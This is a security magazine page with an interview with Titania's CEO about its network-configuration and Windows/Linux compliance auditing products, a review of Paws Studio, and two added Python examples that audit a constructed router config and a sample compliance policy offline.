• Mobile Payment Market, Users Worldwide & Countries Forecast to 2014 http://www.renub.com/report/mobile-payment-market-users-worldwide-countries-forecast-to-2014-59
• India Smartphone Market & Operating System Analysis Forecast http://www.renub.com/report/india-smartphone-market-operating-system-analysis-forecast-54
INTERVIEW
64 http://pentestmag.com Page OPEN 05/2013
Interview with Ian Whiting, CEO of Titania
Ian has been working with leading global organizations and
government agencies to help improve computer security for more
than a decade. He has been accredited by CESG for his security
and team leading expertise for over 5 years. In 2009 Ian Whiting
founded Titania with the aim of producing security auditing software
products that can be used by non-security specialists and provide the
detailed analysis that traditionally only an experienced penetration
tester could achieve. Today Titania’s products are used in over 40
countries by government and military agencies, financial institutions,
telecommunications companies, national infrastructure organizations
and auditing companies, to help them secure critical systems.
Hello Ian, please tell us a few words about Titania.
Titania was founded with the aim of developing
easy to use security auditing software that per-
forms a detailed analysis of systems that other-
wise would require specialist knowledge. The soft-
ware that we have released to date has assisted
both government and leading businesses in better
securing their networks. In the process, Titania has
gained critical acclaim from leading industry ana-
lysts and several awards.
Since opening our first office in December 2010,
Titania has experienced considerable growth. We
now supply our products directly, and through a
network of global partners, to organizations in over
40 countries worldwide. Our customers tend to be
those that are security conscious, in sectors such
as finance, defense, telecommunications, auditing
and manufacturing.
What is it like leading a company like Titania, and what are some of the challenges you face?
There are of course many technical and development challenges to running a business like Titania that specializes in cyber security auditing. However, as soon as we started trading our largest problem was responding to our customers' requests to purchase the software and keeping up with the demand for new features and functionality. In fact our largest challenge to date has been to manage the growth of the company.
We are always looking to keep ahead of the competition, and we have decided on a plan to achieve that goal through the technical capabilities of our products rather than through our company's marketing arm. So although we sometimes have a difficult time communicating our message, our products speak for themselves.
Do you offer any professional services?
We do not provide any professional services at
present, though we are always continuing to re-
view that situation. So we may add professional
services at a later stage, both directly and through
our network of global partners.
Users of our software do not require training ser-
vices as one of our development goals was always
to make our products as easy to use as possible.
I believe we have succeeded in that goal. I have
personally seen non-technical people produce de-
tailed and complex security audit reports using our
software with no previous experience with the tool.
This being said, we are not resting on our laurels
and we continue to look at ways to further improve
user interaction with our products.
How often do you refresh (update) your
products to meet the latest security
challenges and threats?
Our products are continually being updated and are
evolving to meet the requirements of our custom-
ers and the new issues that emerge in the industry.
Typically each of our products has a short release
cycle with updates being made available monthly.
Can you mention some of your top-selling
products?
Nipper Studio is our company’s flagship product.
It takes the manual process of reviewing how net-
work switches, routers and firewalls have been
configured and automates it. This is not done us-
ing the intrusive method of scanning a network de-
vice, which would not give you the full picture of
how the device has been setup, but by analysing
their native configuration.
The reports that are produced by Nipper Studio can contain security audit findings, compliance reporting, configuration reporting and more. The reports produced are equally detailed and specific; they were designed with technology that writes the report just like a human would. This is in contrast to traditional computer report writing technology that simply joins pre-written paragraphs of text together and rarely accurately describes how something specific has been configured.
Our most recent product, Paws Studio, is a Win-
dows compliance product for servers, workstations
and cloud-based systems. It was developed based
on very specific security requirements of our cus-
tomers who work in highly secure environments,
with very sensitive information. They needed a so-
lution that could be run without installing software
on the audited system. Therefore we built Paws
Studio to be able to run over the network, on the
local system or offline with no connection to the
audited system.
Although we have pre-configured Paws Studio with a number of different compliance check lists, you can define your own compliance checklist within the product. We have developed a Policy Editor that enables you to either modify one of the pre-defined compliance lists or create one of your own from scratch.
All of our products have been designed to be
integrated with bespoke and third-party systems,
including continuous monitoring setups. They
can easily be integrated using a scriptable inter-
face and you can export the report data in a vari-
ety of different formats. We also release our prod-
ucts with multi-platform support covering Microsoft
Windows, Apple Mac OS X, Red Hat Linux, Ubun-
tu, Fedora and so on.
Our customers are very important to us and their
needs play a key role in the development of all of
our products. We base a lot of our development
plans around their feedback and requests.
Where do you see network security heading in the next few years? What are some of your predictions?
I see that security compliance is going to play an
ever larger role within the industry than it does to-
day. It is great to see progress towards an ever
improving security baseline, but it also saddens
me to see many organizations depending solely
on compliance as the means to being secure. It is
why I believe it is important that the security indus-
try, in addition to enhancing security compliance
lists, highlight the fact that being compliant does
not mean you are secure.
Unfortunately I can see there will continue to be
security breaches in organizations who manage
security risks with compliance instead of striving
to ensure a truly secure environment. You can al-
most picture the victim company’s statement now. It
would read something along the lines of, “The com-
pany had met their compliance standards and we
are now reviewing our current operating practices to
ensure how best future breaches could be avoided”.
Nipper Studio is fairly popular in the
network security industry; can you give
us some historical background on that
product?
I have a background as a penetration tester and regularly performed manual assessments of various network devices. A proper assessment of a network device is not a five-minute task; each aspect of how a device can be configured needs to be properly analysed and any potential security risks highlighted. Anyone who is simply reviewing firewall rules is not doing a thorough job. It is also a task that requires a high level of knowledge about the device being reviewed. It seemed to me that this is exactly the type of task that is suitable for automation.
***** It is worth noting that although penetration testers are typically both highly skilled and adaptable, they cannot be expected to have in-depth knowledge of every system they come across. The same is also true of the network administrators who manage those systems; they may not have the in-depth security background required to identify potential weaknesses in their systems. Nipper Studio is exactly the type of solution that could help each side, giving penetration testers device-specific assistance and helping network administrators identify potential security weaknesses. *****
Although Nipper Studio originally started life sim-
ply identifying a limited number of security weak-
nesses with Cisco configurations, it soon grew to
adding support for more devices, identifying more
security weaknesses and eventually writing the se-
curity audit report for you.
At Titania, how do you strive to achieve
top-quality software? What kind of
quality control do the products go
through?
This is a very challenging aspect of developing a
product such as Nipper Studio. The number of mov-
ing variables involved with the development process
is huge. We support a large number of different de-
vices, the manufacturers of which are constantly
updating and revising their platforms. Plus the vul-
nerabilities in each platform are forever evolving.
We maintain a growing test environment that in-
cludes the different devices that we support, plan
to support and some others that may never get
added to Nipper Studio. These are all used dur-
ing the development and testing process, together
with different firmware versions. To help manage
the development plan for this we employ a devel-
opment and tracking system that enables us to
manage all these variables together with improve-
ments suggested by our customers. Each devel-
oper and tester knows from our tracking system
what tasks they need to be working on next.
Nipper Studio supports various Cisco
devices and some people may be under the
impression it only supports Cisco devices.
What would you like to say about that?
Nipper Studio does support a wide range of Cisco
devices, it was originally developed with only Cis-
co support and it is used by Cisco. So it is easy to
understand how historically Nipper Studio could be
mistaken for supporting only Cisco devices. How-
ever, the latest versions of Nipper Studio support
over 100 different devices from different manufac-
turers and are used internally by a growing number
of those manufacturers.
Even a network that predominantly uses devices made by a single manufacturer will undoubtedly have a number of network devices made by someone else. We are often approached by customers asking us to add support for unusual systems and devices. The network devices that we see deployed in data centers have evolved over time, with increasing deployments of some devices and the reduction of others. We have developed a plugin-based architecture for Nipper Studio to help us adapt to those changes, enabling us to quickly develop, test and deploy support for new devices.
Very often clients complain that they
are not offered good product/customer
support. How do you ensure good
customer support?
It was important for us to achieve our ISO 9001
accreditation as it helps us to ensure that every
customer receives the same high standard of sup-
port from the point that they first engage with the
company to when they receive the product and the
subsequent support process that follows. We be-
lieve that every customer deserves great customer
service and technical support and we offer these
services free of charge to every one of our custom-
ers. Our ISO 9001 conformance not only ensures
that all of our staff deliver the highest level of sup-
port but also promotes continuous improvement
throughout the company. We achieve this through
collecting and reviewing customer feedback and
auditing our customer care processes.
Thank you Ian, for the interview.
By PenTest Team
Titania
Titania was founded in 2009 and develops network security and compliance auditing software. We now provide our products to global organizations and government agencies in over 40 countries. Our flagship product, Nipper Studio, enables organizations to produce expert-level reports in seconds on network devices (firewalls, switches, routers etc.), and has been recognized by multiple industry awards and nominations. Our customers are made up largely of organizations in the Financial, Telecommunications, IT Security, Government and Defense industries; however, any organization that has networks to protect can benefit from using our security auditing tools.
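The interview describes the approach behind Nipper Studio in two places: audit the device's native configuration offline rather than probing it over the network, and check every aspect of the configuration in context instead of only reading the firewall rules. The script below is an added example of that approach written for this page; it is not Titania's code and not how Nipper Studio is implemented. The IOS-style configuration is constructed for the example, the rule set is a small hypothetical sample, and the severity labels are the example's own.

```python
import re

# Constructed sample running-config (IOS style); not taken from any real device.
SAMPLE_CONFIG = """\
!
hostname edge-rtr1
!
no service password-encryption
enable password cisco123
!
snmp-server community public RW
snmp-server community s3cret RO 10
!
line vty 0 4
 password letmein
 transport input telnet ssh
 login
line vty 5 15
 transport input ssh
 access-class 10 in
 login local
!
end
"""


def parse_sections(config_text):
    """Split an IOS-style config into top-level commands and their sub-command
    blocks. IOS indents sub-commands by one space under the parent line
    (interface ..., line vty ..., router ...), which is all we need here."""
    top, sections, current = [], {}, None
    for raw in config_text.splitlines():
        if not raw.strip() or raw.startswith("!"):
            continue                      # comments / separators
        if raw.startswith(" "):
            if current is not None:
                sections[current].append(raw.strip())
        else:
            current = raw.strip()
            sections[current] = []
            top.append(current)
    return top, sections


def audit_ios(config_text):
    """Return [(severity, finding), ...] for a small hypothetical rule set.
    Severities are this example's own, not a vendor or product rating."""
    top, sections = parse_sections(config_text)
    findings = []

    # Global settings
    if "no service password-encryption" in top:
        findings.append(("medium", "service password-encryption disabled: line/user passwords stored in clear text"))
    has_enable_password = any(l.startswith("enable password ") for l in top)
    has_enable_secret = any(l.startswith("enable secret ") for l in top)
    if has_enable_password and not has_enable_secret:
        findings.append(("high", "enable password used with no enable secret (reversible privileged password)"))

    # SNMP communities: default names, write access, missing ACL
    for l in top:
        m = re.match(r"snmp-server community (\S+)(?:\s+(RO|RW))?(?:\s+(\S+))?$", l)
        if not m:
            continue
        community, mode, acl = m.groups()
        if community.lower() in ("public", "private"):
            findings.append(("high", f"default SNMP community string '{community}'"))
        if mode == "RW":
            findings.append(("high", f"SNMP write access granted to community '{community}'"))
        if acl is None:
            findings.append(("low", f"SNMP community '{community}' not restricted by an access-list"))

    # Management lines: judge each vty block as a whole, not line by line
    for header, body in sections.items():
        if not header.startswith("line vty"):
            continue
        if any(b.startswith("transport input") and "telnet" in b for b in body):
            findings.append(("high", f"{header}: telnet accepted (transport input includes telnet)"))
        if not any(b.startswith("access-class") for b in body):
            findings.append(("medium", f"{header}: no access-class limiting management sources"))
        if "login local" not in body and any(b.startswith("password ") for b in body):
            findings.append(("medium", f"{header}: shared line password instead of per-user login"))
    return findings


def count_by_severity(findings):
    """Summary counts, the kind of figure an audit report leads with."""
    counts = {"high": 0, "medium": 0, "low": 0}
    for severity, _ in findings:
        counts[severity] += 1
    return counts


if __name__ == "__main__":
    for severity, text in audit_ios(SAMPLE_CONFIG):
        print(f"[{severity:6}] {text}")
    print(count_by_severity(audit_ios(SAMPLE_CONFIG)))
```

The point of the vty loop is the one Ian makes about firewall rules: a line such as `password letmein` is only a finding once you know it sits under a `line vty` block that has no `login local`, so the checks run over parsed sections rather than grepping individual lines. Nothing here talks to the device; the input is the saved configuration, which is what makes the review repeatable and safe to run against production equipment.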
Titania’s Paws Studio Review
Whether you see compliance as a burden or an aspiration, we are frequently mandated to meet a certain set of security requirements around our information assets. One important aspect is being able to demonstrate to yourself and to others that your systems meet the criteria set by your compliance regime. How do you ensure that your systems are compliant with your own policies or those mandated by compliance standards? A programme of auditing your systems will help you understand the state of your estate.
Titania’s Paws Studio provides a means to audit Windows and Linux systems and produce compliance reports against a defined set of policies. It sets out to provide clear and detailed reports of the system’s level of compliance. Policy templates are editable, and Paws Studio comes with predefined templates based on established policies and best practice including PCI, SANS and DoD STIG.
Policy templates are essentially a group of compliance audit checks built from the check library pro-
vided by Paws Studio. Checks range from high-level tests such as the presence of antimalware software
right down to individual file permissions and registry settings.
There are two ways of creating and customising policy templates. The first is a wizard that guides you through creating your policy. Here you define the rules that comprise your policy by clicking through a series of screens and selecting checks from the library. The interface is straightforward and self-explanatory, and it is a great tool for less advanced users. However, the more technically minded user might find it time consuming and prefer the supplied Policy Editor instead, which is undoubtedly the more powerful tool.
The Policy Editor presents your policy as a tree, giving you a bird’s eye view of it and the ability to quickly navigate through the rules.
In addition clicking on the advanced tab gives you a syntax-highlighted view of the raw policy XML.
Whatever tool you choose, the result is an XML file defining the compliance checks for your policy and
metadata used to generate the final compliance reports.
Once you have your policy defined it’s time to audit your systems. In order to compile a report you need the compliance audit data collected from a machine, and at this point you have three options. You can choose to audit the local machine where Paws Studio is installed. You can also audit a system over the network; to do this you will need valid administrator credentials on the remote system. Paws Studio will scan the local network for hosts to audit, or you can specify the IP addresses of the machines in scope.
The third option is to use the portable data collector software, a small executable that can be run from a thumb drive. This is particularly useful where you need to audit a system that is not on the network or is air-gapped from your audit workstation. Run the Data Collector, choose an audit policy, and it will create a .paws file with the audit results.
Once you have collected your audit data you can produce a report on the audited system. Reports contain the result of each test on the system as well as summary charts showing the percentage of tests passed and a breakdown of failed tests by severity. Paws Studio creates a compliance audit report that can be saved as HTML, PDF, PostScript or a Microsoft Word document. CSV and XML formats are also available, so you can feed machine-readable reports into other reporting systems or build your own applications to consume your compliance data.
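The workflow the review describes (a policy template that is a set of checks, an audit run against a host, and a report giving the pass rate and the failures by severity in a machine-readable form) reduced to a small runnable sketch. This is an added example for this page, not Paws Studio's code: the XML schema, the check types, the severity labels and the CSV columns are all invented for the example, and the audited "host" is a temporary directory the script builds itself with one deliberately weak setting and one world-writable file.

```python
import csv
import io
import os
import re
import stat
import tempfile
import xml.etree.ElementTree as ET

# Hypothetical policy template. The schema (check / type / severity attributes)
# is invented for this example and is not the Paws Studio policy format.
POLICY_XML = r"""<policy name="example-linux-baseline">
  <check id="SSH-01" severity="high" type="config_regex"
         path="etc/ssh/sshd_config" pattern="^PermitRootLogin\s+no$"/>
  <check id="FS-01" severity="medium" type="not_world_writable"
         path="etc/ssh/sshd_config"/>
  <check id="FS-02" severity="low" type="not_world_writable"
         path="tmp/scratch.txt"/>
</policy>
"""


def build_sample_host():
    """Create a throwaway directory tree standing in for an audited host.
    Constructed for the example: root login left enabled, one world-writable file."""
    root = tempfile.mkdtemp(prefix="audit-example-")
    os.makedirs(os.path.join(root, "etc", "ssh"))
    os.makedirs(os.path.join(root, "tmp"))
    sshd = os.path.join(root, "etc", "ssh", "sshd_config")
    with open(sshd, "w") as fh:
        fh.write("PermitRootLogin yes\nPasswordAuthentication no\n")
    os.chmod(sshd, 0o644)
    scratch = os.path.join(root, "tmp", "scratch.txt")
    with open(scratch, "w") as fh:
        fh.write("scratch\n")
    os.chmod(scratch, 0o666)          # world-writable on purpose
    return root


def check_config_regex(root, path, pattern):
    """Pass if some line of the file matches the pattern."""
    with open(os.path.join(root, path)) as fh:
        return any(re.match(pattern, line.rstrip("\n")) for line in fh)


def check_not_world_writable(root, path):
    """Pass if the file lacks the other-write bit."""
    return not (os.stat(os.path.join(root, path)).st_mode & stat.S_IWOTH)


# Check library: policy 'type' attribute -> implementation
CHECKS = {
    "config_regex": lambda root, c: check_config_regex(root, c.get("path"), c.get("pattern")),
    "not_world_writable": lambda root, c: check_not_world_writable(root, c.get("path")),
}


def run_policy(policy_xml, root):
    """Evaluate every <check> against the tree at root; one result row per check."""
    results = []
    for check in ET.fromstring(policy_xml).iter("check"):
        passed = CHECKS[check.get("type")](root, check)
        results.append({"id": check.get("id"), "severity": check.get("severity"), "passed": passed})
    return results


def summarize(results):
    """The two figures a compliance report leads with: pass rate and failures by severity."""
    passed = sum(1 for r in results if r["passed"])
    failed_by_severity = {}
    for r in results:
        if not r["passed"]:
            failed_by_severity[r["severity"]] = failed_by_severity.get(r["severity"], 0) + 1
    return {
        "total": len(results),
        "passed": passed,
        "pct_passed": round(100.0 * passed / len(results), 1),
        "failed_by_severity": failed_by_severity,
    }


def to_csv(results):
    """Machine-readable export for downstream systems (column set is the example's own)."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=["id", "severity", "passed"])
    writer.writeheader()
    writer.writerows(results)
    return buf.getvalue()


if __name__ == "__main__":
    host = build_sample_host()
    rows = run_policy(POLICY_XML, host)
    print(to_csv(rows))
    print(summarize(rows))
```

Keeping the policy as data separate from the check library is what makes templates editable in the way the review describes: a new baseline is a new XML file, while the code only grows when a new kind of check is needed. The same separation is what lets the data collection step run on an air-gapped machine and the reporting step run elsewhere, since the results rows carry everything the summary and the export need.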
Paws Studio is available for Windows, Mac OS X and various flavours of Linux, and currently supports auditing of Windows and Linux systems. The software is pitched at the SME market, which could be priced out of enterprise-grade auditing software and is unlikely to benefit from the bells and whistles those tools provide. If you need a cost-effective and easy to use compliance reporting tool, Titania’s Paws Studio certainly merits a second look.
By Jim Halfpenny